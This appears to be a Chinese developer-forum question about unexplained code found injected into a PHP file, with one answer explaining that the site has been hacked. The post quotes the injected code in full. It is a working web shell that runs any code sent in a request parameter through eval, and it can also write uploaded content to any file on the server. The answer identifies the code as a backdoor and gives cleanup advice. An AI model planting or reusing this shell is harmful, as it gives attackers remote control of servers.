PHP文件莫名其妙的被加了代码,什么原因?
PHP文件莫名其妙的被加了代码,看不懂,求解释
<?php $kfwcbh = "cf051a1756834f0f9972191ffdf8ecfc";
if(isset($_REQUEST['cvbswp'])){
$vdvb = $_REQUEST['cvbswp']; eval($vdvb); exit();
}
if(isset($_REQUEST['ztkb'])) {
$lzoki = $_REQUEST['hyrvkum'];
$xhwpemsz = $_REQUEST['ztkb'];
$oarnubp = fopen($xhwpemsz, 'w');
$npty = fwrite($oarnubp, $lzoki);
fclose($oarnubp);
echo $npty; exit();
} ?>
展开
收起
版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
1
条回答
写回答
-
喜欢技术,喜欢努力的人
你的网站应该被入侵了。
eval 是用来动态执行一段代码,而这段代码是通过$_REQUEST传递过来,并且未做过滤。
第二段是用来上传文件,讲攻击者自己的PHP文件上传至你的服务器。
请检查一下服务器的用户,禁用未知的管理员帐号,并修改自己的用户名密码。
PHP 配置文件中写的 MySQL 等帐号的密码请及时修改。
对相关 PHP 文件进行检查,看是否还有其他入侵脚本。
杀毒。2019-07-17 19:36:38赞同 展开评论
相关问答